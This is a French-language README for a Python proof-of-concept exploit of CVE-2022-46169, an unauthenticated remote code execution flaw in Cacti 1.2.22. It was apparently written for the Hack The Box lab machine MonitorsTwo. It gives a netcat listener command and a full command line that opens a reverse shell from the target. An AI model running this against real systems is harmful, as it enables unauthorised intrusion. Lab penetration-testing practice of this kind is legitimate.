
Exploit Python pour CVE-2022-46169 permettant une exécution de code à distance non authentifiée sur Cacti 1.2.22 via un reverse shell, destiné à des tests de pénétration éducatifs.
Ce dépôt contient un exploit pour CVE-2022-46169, affectant Cacti 1.2.22. Cette vulnérabilité permet à un attaquant non authentifié d'exécuter du code arbitraire sur le système affecté.
Si vous souhaitez une analyse détaillée du fonctionnement de cet exploit, veuillez vous référer à cet article de Rapid7. Ils entrent dans les détails sur les spécificités.
J'ai écrit ce code, avec l'aide de chatGPT, pour une machine Hack The Box appelée MonitorsTwo à des fins éducatives.
Arguments:
-u URL of Cacti Application
-lhost IP address of machine you want the shell on
-lport Port of the machine you want the shell on
Configurez un listener sur votre machine locale avec netcat nc -lvnp 9001
Lancez l'exploit contre la cible
python3 CVE-2022-46169.py -url http://10.10.11.211/ -lhost 10.10.14.3 -lport 9001
Cette preuve de concept (PoC) est destinée strictement à des fins éducatives et de test. Utiliser ce PoC sur tout système ou réseau sans autorisation explicite du propriétaire du système est illégal et peut entraîner des poursuites judiciaires. Le créateur décline toute responsabilité en cas de dommage découlant d'une utilisation correcte ou incorrecte de ce PoC. Utilisez-le à vos propres risques.
https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-46169/